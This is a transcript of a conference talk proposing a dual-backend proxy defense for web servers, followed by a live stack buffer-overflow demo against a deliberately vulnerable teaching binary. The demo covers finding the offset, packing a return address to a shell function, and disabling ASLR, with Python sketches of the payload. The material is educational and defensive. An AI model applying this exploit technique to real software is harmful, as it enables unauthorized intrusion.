
Creating a Secure Web Server from 2 Vulnerable Web Servers

BSides Charleston · 2024 · 46:03 · 171 views · Published 2024-11 · Watch on YouTube ↗
Speaker: Parker Garrison
Category: Technical
Style: Demo
About this talk
"A Shell? In the HTTP server response factory? Ok I guess we doin' shells now:" Creating a Secure Web Server from 2 Vulnerable Web Servers (Live Exploit Demos!) by Parker Garrison Join cybersecurity expert Parker Garrison as he dives into innovative ways to secure a web server by combining two vulnerable servers to create a resilient defense system. This live demonstration explores exploit mitigation techniques, particularly through a consensus-based defense approach that leverages the strengths of each server to mitigate vulnerabilities and prevent data loss. Key Topics Covered: • Consensus-Based Defense: Combining two distinct web servers to block attacks when only one remains secure. • Exploit Mitigation Techniques: How consensus-based defenses reduce risks of data loss, buffer overflows, and other common exploits. • Memory Safety and Buffer Overflow Prevention: Using redundancy in servers to prevent successful exploitation. • Historical and High-Profile Vulnerabilities: Examples of defenses against attacks like Code Red, Heartbleed, and Spectre using diversified server architectures. Garrison shares insights into both the theoretical and practical aspects of this novel security approach. With live exploit demos and in-depth explanations, this talk is ideal for those in penetration testing, threat intelligence, and cyber defense.
Transcript [en]

If I could have your attention: hey, good morning, guys. We're going to move into web servers with Parker here. We're live next, so let's get a round of applause for Parker. All right, thank you, everyone. So the title of my talk is "A Shell? In the HTTP Server Response Factory? Ok, I guess we doin' shells now." We're going to be creating a secure web server from two different vulnerable web servers. And if you don't know what meme I'm referencing, you will see it in a few minutes. Disclaimer: the views expressed by the speaker in this presentation are the same as the official views and positions of my employer. Wait, what? Isn't that usually supposed to say

something else? Well, as the founder of the company Iguana Cyber, I am authorized to speak on behalf of my company. We are still very early, pre-seed. About myself: I've spent some time working in both the public and the private sector. I helped contribute to the MITRE D3FEND framework and CWE when I worked there, and I worked for a major defense contractor. I also have experience as an independent security consultant, helping mostly with penetration testing. And then I tried to figure out: well, how can I stop the stuff that I'm doing? And so this consensus-based defense technique is something that I came up with. All right, let's go ahead. So, many people face

the problem of trying to determine what program to use in a certain scenario. Different programs are going to have different vulnerabilities introduced at different times. So, like, here we have program one. It's got a vulnerability from 2023 or so; it lasts about a year, and we don't know the severity of it. There's another program, and, oh, also, this one had a driver flaw that prevented it from working, which rhymes with a certain security company that had that same issue earlier this year, grounding hundreds of flights across the country. And then this other program has a vulnerability for a longer time. Well, why not use all of these? Wait, then we'd have all the vulnerabilities? Nope. It turns out that we can be secure if at

least one of these programs at each given point in time is secure. So here we see that there are very few times where using all the programs would have been secure, indicated by light green on the left here. But if one of the programs is vulnerable and the others are secure, we're going to show an example of how you can maintain security in your environment. So, a quick overview of how this works for a web server. On a normal web server, the guy on the assembly line is just like, "A shell? In the HTTP response factory? I guess we doin' shells now." If the intrusion detection system on the host or on the network is not able to detect that what was going on

was an exploit, then you're basically stuck. Once you get to the output and it leaves your environment, there's no further filtering that you can do there; the attacker is going to get your private data. But the alternative here is to not listen to that guy, and instead see if we can tell the difference between two different web servers that should be properly responding with the exact same web page content. Now, "exact same" is caveated by a few different things that we had to filter out. For example, obviously the Server header in HTTP is going to be different. There are also some other aspects of a web page: cookies were particularly challenging, and many JavaScript frameworks can, for example, return dictionaries

in any order. So that all has to be normalized. But then, after I go through that normalization: are these two exactly equal or not? So now you can tell if you've got one vulnerable and one not-vulnerable web server. Compare these as they're coming off the assembly line: matches up, matches up, doesn't match up. We don't need to know what a shell looks like; we just know that it doesn't match up with what's going on right now. We don't rely on any historical baseline. We rely on the actual response from an actual other web server that you set up in your environment.
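The normalization step he describes can be sketched roughly like this. Note this is my own minimal sketch, not the actual Iguana Cyber implementation: the header list and the JSON re-serialization are illustrative assumptions about what "filter out and normalize" means.

```python
import json

# Headers that legitimately differ between two distinct web servers
# (an illustrative list; the real proxy filters more than this).
VOLATILE_HEADERS = {"server", "date", "set-cookie", "etag"}

def normalize(headers, body):
    """Reduce a response to a canonical form for comparison."""
    kept = {k.lower(): v for k, v in headers.items()
            if k.lower() not in VOLATILE_HEADERS}
    # JSON bodies may serialize dictionary keys in any order, so
    # re-serialize with sorted keys so equivalent payloads compare equal.
    try:
        body = json.dumps(json.loads(body), sort_keys=True)
    except (ValueError, TypeError):
        pass  # not JSON, compare the raw body
    return (tuple(sorted(kept.items())), body)

def responses_match(h1, b1, h2, b2):
    return normalize(h1, b1) == normalize(h2, b2)
```

With this, two backends that differ only in their Server header and JSON key ordering compare equal, while a response carrying leaked data does not.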

So, measure twice, cut once. If just one piece of software is secure against a given exploit, we're able to neutralize these attacks and also prevent data loss. Data loss prevention is a very tough field, because with any number of ways of encrypting or encoding the data, the data can get out. A lot of data loss prevention solutions that I've seen are simply fooled by just Base64-encoding the data, which, as you know, they should at least be checking for, right? So in the example here, you send a malicious request, and one of them returns the response that the attacker was looking for. The other could have a firewall on the host, or whatever library it's using; it's not

using the same component, so this request means absolutely nothing to it. In the middle, our proxy will be able to just send back access denied.
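The proxy's go/no-go decision described above can be sketched like this. This is a toy sketch under stated assumptions: the backends are stubbed as plain functions, and the "access denied" response and alert hook are my guesses at the product's behavior, not its real interface.

```python
def consensus_fetch(request, backend_a, backend_b, alert=print):
    """Forward one request to both backends; release the response
    only when the two (already-normalized) answers agree."""
    resp_a = backend_a(request)
    resp_b = backend_b(request)
    if resp_a == resp_b:
        return resp_a
    # Disagreement: one backend likely did something the other refused
    # to do. Block the output and raise a high-fidelity alert.
    alert("consensus mismatch for request: %r" % request)
    return "403 Access Denied"

# Stubbed backends: B is "vulnerable" to a fake injection, A is not.
safe = lambda req: "<html>hello</html>"
vuln = lambda req: "uid=0(root)" if "exploit" in req else "<html>hello</html>"
```

On a benign request both stubs agree and the page passes through; on the malicious request only the vulnerable backend leaks, the responses differ, and the proxy blocks the output.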

So, some examples. You have a mission-critical binary. Who knows why you're still running something from 2008 and haven't updated it, but it happens in many organizations. Of course, they're not producing any updates for this, but maybe you still have executables for at least Windows and Windows Server, and maybe Linux also, as we're going to see later if we do the live demo of a buffer overflow. Memory layout across operating systems is extremely different, so one set of buffer overflow techniques is not going to work on both; an attacker would have to simultaneously exploit two different platforms. Or, you also know that you have some piece of software in your tech stack that's bound to have a vulnerability, and you want to

diversify the risks for that. So now I'm going to step through how some of the most high-profile attacks that we might have heard of are addressed by a consensus-based defense. This one's a bit of an older one: Code Red. It's a buffer overflow vulnerability in the IIS web server. But if we were to also add a Linux-based web server in that back end, as we had earlier, the responses that we're sending would not match up. This was a buffer overflow exploit, and so although it may take the Windows web server offline, we'll be able to quickly restore it and put another server in place, as I'll show in the third example here: memory leak attacks. You

may also remember Heartbleed. That was a buffer over-read in OpenSSL, a library that's widely used on Linux-based systems but not used as much on Windows-based systems; instead, on Windows, the SSL capabilities are built into the operating system. Example: user Meg requests these six letters, "potato", and the server responds with "potato". Another properly conforming request: she asks for "bird", and it sends back "bird". But essentially, what this vulnerability was: the user requests 500 letters, "hat", and obviously a person should not be reading "the server's master key has changed", "Isabel wants pages about snakes, but not too long". So now you're able to read information that's private to the server or belongs to other users. All right. So in

addition, as I mentioned on our first item about Code Red, if you brick the web server, you're able to stand another one up in its place. So this looks like the logo of a certain security company that rhymes with Cloud Strike that, earlier this year, took down millions of PCs in the US alone. Instead of "we stop breaches", they ended up stopping everything. So yeah, I guess they stopped breaches as well.

So we have a cold spare running in the environment. It's usually not used for anything, but can be booted up and run as needed. Let's say server B gets taken over by Cloud Strike. We can't boot it; it blue-screens as soon as we try to do anything in it outside of safe mode. So we can just take that server off the network, take however much time we need to respond to it, and then connect another cold spare. And then, with our two subordinate web servers, we still have essentially the same security guarantees as before server B went down. All right, another vulnerability that came about last year, in xz-utils: basically, many open-source

software packages had a complete reliance on this one component. A backdoor was inserted deliberately, over the course of several years, by a GitHub user going by the name Jia Tan, who had no affiliation with other open-source software projects or really any information about himself on the internet. However, he was able to convince the maintainers, who were overworked, into allowing him onto the software project as an administrator, and then he started making several questionable changes, including inserting an absolute backdoor that allowed anyone with his SSH key access to millions of devices across the internet.

So on Windows, though, instead of the xz utilities being used by that library, Windows uses LZ32.dll, so it was not vulnerable. And additionally, if you're behind our proxy, or really any good firewall, you're not going to allow port 22 directly to your web servers from an external environment; you're going to restrict where that can be accessed from, possibly only internally. And next, let's talk about speculative execution. So, is Spectre still an ongoing problem? I mean, wasn't that so 2018? Is it still something this year? Yes. This past month? Also yes. And this past week? Also yes. Speculative execution exploits, though, are extremely targeted to the specific platform, the processor

on which you're executing the exploit, for example Intel, AMD, or Qualcomm, and even more so to the CPU architecture, where instructions on one CPU would mean complete garbage on another CPU. So using two different CPUs that cache information in completely different ways, and use completely different instructions, results in at least one back end being unsuccessful. So of course the responses won't match up, and the attacker will not get their sensitive information. Now, I've mentioned using two different back ends, but really, what's the historical likelihood of two being vulnerable at the same time? Using Google's Project Zero data, I did some research and found that unpatched vulnerabilities that allowed remote code execution

into web servers, at least, have never occurred simultaneously or within a two-month window. So if you're able to diversify your other components as well, and use a reasonable patching cycle of at least every one or two months, then, based on this data, you're likely to remain secure even if there is a simultaneous exploit; as I mentioned, for example with Spectre, you're going to have a hard time matching things up. And we're going to see exactly how a memory vulnerability is thwarted by this later, in part two of our presentation. So, today's practice: simple request-response. Instead, what we're moving to here is to send the request to two separate web servers, then normalize and

compare the responses. If they don't match up, the point is that we can send a high-fidelity alert to the SIEM that something was up. Normally, these responses should always be the same, so we know that an exploit was attempted against us, rather than something general that might not apply to our environment. And here's an example of it working with WordPress. So, if we're able to block these requests that were obviously an attack, then how effective is it? Well, a 2023 report by Censys found that even blocking simple fingerprints of scans, they were able to block 93% of follow-on attacks. The number of targeted attacks goes down to 7% of what

it otherwise would have been. And additionally, a report from Hacker Factor last year showed that within the past 10 years, by employing more advanced fingerprint blocking, they were able to reduce themselves to dealing with only one targeted attack, and significantly reduce the number of alerts that their small SOC had to look at. So, in the early days of security, the 1990s and 2000s, we were focused on prevention. Now, with things such as zero trust, we're focusing more on detection, and doing more threat hunting as well. This takes us another level: being able to do some successful prevention again. The attacks may still technically occur on the back end to completion, but the data is not going to get out to the

attacker. Every attack has to occur in at least three phases: the input of the data, the processing of the data, and the output of the data. So if all of the other defenses fail, this will stop the attack when it's trying to output the data, in the middle at the proxy, right here. All right, so now we get to do some hands-on exploit development, and I'll get into that demonstration I was talking about. I'm going to pull up a Slido link for us so that we can participate, along with the questions right here,

as well as switch my presenter view. So just give it about 60 seconds right here.

All right, so go to slido.com

and we're going to enter the code: overflow.

It is overflow, O-V-E-R-F-L-O-W, and I will put up a sample question here.

All right, so let's get started with examining exactly how buffer overflow exploits work in a program. To understand that, we're first going to have to look at what memory is read or written to by a buffer overflow exploit. All modern operating systems use a concept called a stack, so let's look at how that works first, as well as the layout of memory inside the stack.

Modern programs consist of many different memory segments. These segments include the code, data that's initialized prior to the program being run, and space that's saved for dynamically allocated data once the program is running, both of a known size and an unknown size. I've included a program if you want to follow along with my slides: use git clone https://github.com/

ParkerGarrison/overflow. So, this segment_memory program, let's take a look at it. It's just going to print out what some segment addresses are on Linux. As I mentioned here, this is where the code is stored; this is actually going to be a pointer to the main function here. It's called the text segment for historical reasons. Then we can look at the initialized and uninitialized data segments here, that's .data and .bss, which stands for "block started by symbol", and then the heap and the stack. The stack is where we're going to be focusing our efforts in the exploits, because some security-relevant information is on the stack, as well as variables that we can

control. So if we're not restricted to writing within the bounds of those variables on the stack, then we can overwrite that security-relevant information, which is called the saved instruction pointer. So let's take a look at some of these addresses. Let's do gcc segment_memory.c -o segment_mem. Now let's run segment_mem. All right, so that works here. We get an address in the stack that, as we can see, is near the high end of memory, and the way our compiler worked, everything else was shoved into lower memory. And so now let's enable ASLR,

which on Linux can be done pretty much without a restart,

and run our program again.

Made a typo here; wanted to pipe that. So now we see the address is different. This is a safeguard that randomizes the start of the stack so that we can't simply insert static values that are known in advance; we have to execute some sort of memory leak in order to get the addresses that we want.

So this will all make more sense as we're going through the exploits. So here is that virtual memory layout from the output of our program, just taken and put in here. We have the text segment, the data segments (initialized and uninitialized data), the heap, which we're not going to be touching today, and then memory that can be shared between the stack and the heap as needed. Kernel memory is above all of this, and we're also not going to be interacting directly with the kernel today; we can do our exploits entirely in user space. And you can see what permissions are typically applied to each of these memory segments: whether they're readable, writable, or executable. The only one that should be executable is the text segment,

though, also, if you know the addresses of something in the stack and you can make that executable, then you could write your shellcode into the stack and execute it. That's more advanced, and we won't be getting to that today; we will just be using an address that we know is in the text segment. All right, so we talked about ASLR. Now let's go and see: why do we use a stack? Why is this common among basically every platform today? In the very early days of programming languages, like in the 1960s or so, space for variables had to be allocated statically before the program was run. When you're dealing with a maximum of 64K of memory, that kind of

makes sense. But as we wanted programs to be more dynamic, and to be able to include large libraries without reserving space for all the variables of functions we're never going to run, the common idea of a stack came about: when we call another function, it reserves space for the variables and keeps a pointer back to the function stack frames under it, so that when we finish that function, we know where we have to go back to and can continue executing. A stack frame also allows the use of recursion; we can call the same function multiple times without having to rely on the same variable spaces. And this is common to basically every

programming language today. So when we call a function, there's some important data that's saved on the stack; I mentioned where we go back to once the function is done. So now we're going to look at the actual assembly language to see how that takes place. The caller is responsible for setup before the new function; then the callee, the function that's called, has to do some setup of its own; and then the callee has to actually determine where to go back to in the caller. And then the caller just continues from there; it doesn't have to do anything else. So in 32-bit assembly language, EIP is the register that stores the instruction pointer. It can't be changed directly, though; when

you call a function, the instruction pointer will point to the start of that function. And I also mentioned the stack pointer and the base pointer. So we saw, if we go back to here, that the stack is growing downward. Higher memory addresses are at the top of this diagram, and lower memory addresses, where we saw the text segment and such, are at the bottom of the diagram. So as we create a stack frame for a function that we call, it's going to have a lower memory address: the stack grows toward lower memory addresses and shrinks toward higher memory addresses. This can sound confusing at first, but some of this was just done for historical reasons, and

the fact that the stack grows toward lower memory addresses, but most buffers are written toward higher memory addresses, is why we can overwrite the data of previous stack frames and data that's important to our own stack frame. If the buffer were to, say, go in the other direction, then we would only be able to overwrite variables in our local function, and might not be able to have as much of an impact. But this decision is what has made stack-based buffer overflow exploits so common. And now let's take a look at just three assembly instructions: push, pop, and call. So, pushing a register to the stack: it moves to where the stack pointer is at, that's

referencing the stack address, puts that value onto the stack, and then subtracts to make more room on the stack. Remember, as the stack grows, it grows toward lower memory addresses, so the edge of our stack is going down toward lower memory addresses because we made more room. We can also pop something into a certain register, which will basically take it off the stack and move the edge back up. In very early assembly languages for early computers, there weren't many other instructions to reference somewhere in the middle of the stack, and so these instructions were used extensively. Nowadays you'll see them mostly just for setting up and tearing down the start and end of a function, and

then finally, call with a function name. Essentially what call does is push the instruction pointer onto the stack and then jump to the start of that function. So when we push the instruction pointer to the stack, we are again writing it here, decreasing the address of our stack edge so the stack can grow downward. All right, so now I want to see how well I've been describing this stuff so far. Let's take a look at the Slido poll, if you've pulled it up: in typical program execution, what is the value of the ESP register, the stack pointer, that is, the edge of the stack, compared to EBP, the base of the

current function's stack frame? Is ESP less than or equal to EBP, greater than or equal to, or does it vary depending on the circumstances? All right, I see we've got a lot of responses in already. It was a mixed bag before, I saw one response under each, but now most people are picking the correct answer. We've got 70% for "less than or equal to": the stack does grow downward.
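The push/pop/call behavior just described can be modeled in a few lines. This is a toy model of a 32-bit downward-growing stack for intuition only, not real machine semantics; the starting address is arbitrary.

```python
class ToyStack:
    """Toy model of a 32-bit stack that grows toward lower addresses."""
    def __init__(self, top=0xFFFF0000):
        self.mem = {}    # address -> 4-byte value
        self.esp = top   # edge of the stack

    def push(self, value):
        self.esp -= 4                # grow downward first...
        self.mem[self.esp] = value   # ...then store at the new edge

    def pop(self):
        value = self.mem[self.esp]
        self.esp += 4                # shrink back toward higher addresses
        return value

    def call(self, eip, func_addr):
        # 'call' is effectively: push the return address, then jump.
        self.push(eip)      # where to resume in the caller
        return func_addr    # the new instruction pointer

s = ToyStack()
new_eip = s.call(eip=0x40100A, func_addr=0x401200)
```

After the call, the saved return address sits at the current edge of the stack, which is exactly the value a buffer overflow later aims to overwrite.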

So now let's take a look at what happens in the called function itself. It will push the base pointer onto the stack, so the stack grows downward; then it will set the base pointer to where the edge of the stack is. And then it will make room for the current variables, so the ESP value will be lower than the EBP value by n, whatever amount of space was decided in advance for the variables. Then at the end, it just does the same thing in the opposite order. Now, if the value that it's restoring at the base of the stack is not the legitimate saved base pointer, or if the value that was saved right on top of that was not the

legitimate instruction pointer, then we can take control of the program. So in the sample stack here, I've reversed the direction of the diagram from before: lower memory addresses are going to be at the top, and higher addresses at the bottom. So let's see how that works out normally. Now, with a buffer overflow, the variables are what get overwritten, and then control goes to somewhere that doesn't exist, because the ASCII character "A" corresponds to 0x41414141, which is not a valid memory address. So we could either determine exactly what the offset is, or we can just start shoving in data that's unique per each four-byte value and see what exactly ends up in

the instruction pointer and the base pointer, to see where we can take control of it. So our exploit-writing procedure is going to look something like this: we find an input opportunity to write the data; we identify what exploit mitigations are in place (and for this talk, we're going to go very quick, so we're not going to implement many exploit mitigations); then we see if we can get the program to crash. So let's take a look at the program that we're going to try to exploit. Instead of having a full-fledged web server, I took out well over 90% of the proxy logic that was dedicated to HTTP, so we can just do this quick demo with an

example program I have right here. So let's compile our wisdom program.

We can see already there are some vulnerable functions in here; gets(), that is, in fact, the one that we're going to use. So let's run wisdom.out. Main menu: log in, log out, status, receive wisdom, add wisdom. So "add wisdom" sounds like a place to enter data; login does too. Let's see what "receive wisdom" does first: "Don't drink coffee past 4 PM, unless you want to stay awake until the AM." "A great shell to use has been bash." "You can get a power-up in some video games by entering the Konami code." Let's try to add wisdom now. Let's do "test one", "test two", and let's receive that back. Okay, so it printed back to

the screen; that's "test two" right there. I don't know what happened with the string "test one". Now let's try adding some longer data: just hold down the "A" key repeatedly and see if we have overflowed that buffer. Segmentation fault. A segmentation fault means that it tried to access memory that did not exist. Now let's try to figure out exactly how far our offset is into the exploit, so let's use GDB so that it will stop the program and tell us what's going wrong.

And let's run now. I have a tool here to generate characters that are different every four bytes; it's in the overflow directory if you cloned that from GitHub, and it's called patgen, for pattern generate. So let's just generate about 200 characters; that should be enough, based on the amount of A's we did. So we're going to add wisdom; let's just put that in both fields. All right: "Program received signal SIGSEGV, Segmentation fault." This is promising right here, because that looks like ASCII data.
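The pattern trick can be sketched in a few lines. This is my own minimal encoding of the idea, not the actual output format of his patgen tool: every aligned 4-byte chunk is unique, so whatever value lands in EIP at the crash pinpoints the offset.

```python
def make_pattern(length):
    """Pattern whose every aligned 4-byte chunk is unique, so the
    bytes seen in the crashed EIP identify the offset directly."""
    chunks = (b"A%03d" % i for i in range(length // 4 + 1))
    return b"".join(chunks)[:length]

def find_offset(pattern, value):
    """Return the aligned offset of the 4 bytes seen in the crash."""
    for off in range(0, len(pattern) - 3, 4):
        if pattern[off:off + 4] == value:
            return off
    return None

pattern = make_pattern(200)
```

Feed the pattern into the vulnerable field; if the crash shows, say, the chunk at offset 152 in the instruction pointer, that is exactly how many filler bytes precede the saved EIP.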

So now let's see what the offset in the pattern was. All right, so we get two different values here; what's the difference between little- and big-endian? Well, obviously we didn't generate that many characters. Little-endian and big-endian are two different ways of storing values in memory. For historical reasons, Intel decided it was easier to store certain values in memory backwards, with the most significant byte last, whereas other processors were using the most significant byte first. Really, as long as you're reading in a consistent way, both of them work, though this way that seems backwards to us is the one that is more common in processors today. So the names little- versus big-

endian came from the book Gulliver's Travels. It was basically a pointless dispute between two different factions: do you crack the egg on the bigger end or the little end? Both of them work, but obviously you can't do both at the same time. So we see that we need to pad with 152 bytes of filler before we get to the value we want to overwrite here. So if we were to look at the list of functions in this program, what could we use in here to overwrite with? Let's just do "continue" and pull up the library functions. Let's see which function might be valuable to us: frame_dummy, right... secret... oh, shell. Well, maybe, if this is in the program

and we just call a shell immediately; I don't know, let's try it. So I've included a script here also, run_escape, that will escape the characters, so we don't have to write out separate scripts each time. So, like, I will do run_escape.sh and then wisdom.out. I'm in the wrong directory, I guess; move up. So, overflow/run_escape.sh wisdom.out. So I'm going to need to first generate 152 A's and then put this value packed in little-endian, which, as I said earlier, just means reversing the bytes. So let's get ourselves 152 bytes of filler and start making our exploit here, doing this on the fly without even writing a separate script for

it. If you use a library like pwntools, then you can pack it into four bytes without having to do this byte reversal manually.
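The packing and payload construction can be sketched with the standard library alone. The offset (152) and the shell() address (0x40129d) are the values from this particular demo binary; yours would differ, and the payload framing around the menu input is an assumption about how wisdom.out reads its fields.

```python
import struct

OFFSET = 152              # filler bytes before the saved EIP (from the demo)
SHELL_ADDR = 0x0040129d   # address of the program's shell() function
                          # (value from the talk; recompilation changes it)

# Little-endian means the least significant byte is stored first,
# so 0x0040129d becomes the byte sequence 9d 12 40 00.
packed = struct.pack("<I", SHELL_ADDR)

# Payload: pad up to the saved instruction pointer, then overwrite it.
payload = b"A" * OFFSET + packed
```

struct.pack("<I", addr) does the same 32-bit little-endian packing that pwntools' p32() helper would, without the extra dependency.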

Now let's enter some wisdom... All right, so what happened here? Did it call the shell function, or did we see...

Shells may not give a pound prompt back if they work. Broken pipe. All right. If we were able to do this correctly, we would see that we are getting a shell here. So let's try one more thing, just writing it in its own program to print this out. So,

this live demo has worked two out of three times before today, so today might be two out of four; we'll see if we can make it three out of four. So, A's equals "A" times 152; then the instruction pointer to overwrite equals the shell address over here, 0x40129d. I'm going to navigate the menu: we're going to print 5 to select adding wisdom, the payload is the A's plus the IP, and then we're going to print the payload for both the title and the value of the wisdom. So let's see if we can pipe this in properly, and then

let's do python exploit1.py and see if it's printing out exactly what we want. Pipe it into a hexdump. And yep, sure looks like it; there is the shell address over here, though there's an extra 0xc2 character.

All right, so let's go and dump this into the wisdom binary. So, it did something there; it didn't crash the program. All right, let's try running this in GDB and see what happens. So we'll do our run with escape, wisdom.out. Let's quit out of here; we can attach GDB to an existing process,

continue it, and see if we can do anything over here; then we can attach to the right process.

So now we have no other processes running over here; we should find the right one. And now, if we do something here, we see we're hooked to the debugger and it can't do anything; continue. Now, let's enter a title. Let's enter our exploit over here,

and this time let's just run this without it being escaped, so we don't escape the values twice,

let's continue over here.

All right, segmentation fault. So it doesn't like this value, 0x40129d. So let's examine what's there; is it an instruction? Can't access that memory. Ah, probably because ASLR is still on here, so it's going to a different address. So yeah, ASLR caused it to kick to that different address; we can see why one of our exploits was causing this problem. It looks like I've got three minutes or so to wrap up. Let's see if we can remember to disable ASLR before the demo.

And let's run this program again, attach to it with gdb, and continue. Now, let's try our exploit once again. "Detaching after vfork from child process"... so something happened here with our read; maybe the shell creates a child process. Wow, we have a shell.

All right, so now I'm just going to show how, if you had a consensus-based defense in place, this would not work: the other side would crash, and you'd essentially be accessing memory that didn't exist in the other program, as happened when ASLR was on in the system. Even if it's on in one but not the other, it still won't work. So in this window, we're going to start our binary to run wisdom forever,

and then here we're going to run our proxy forever, and

then see if we can connect to it.

All right, looks like we're having some timeout errors. All right, well, it looks like I am out of time here. But the point is, if we were able to connect to both systems in time, the memory addresses would not line up if we were to attempt the memory leak, and if we were to attempt a buffer overflow like this, even though there was a shell in one system, the response would not get passed through the proxy back to the attacker's endpoint. All right, I'll leave my contact information up here if you're interested in talking about beta testing this; we are also looking for potential seed investors as well. So I am parker@parkergarrison.com,

and thank you all.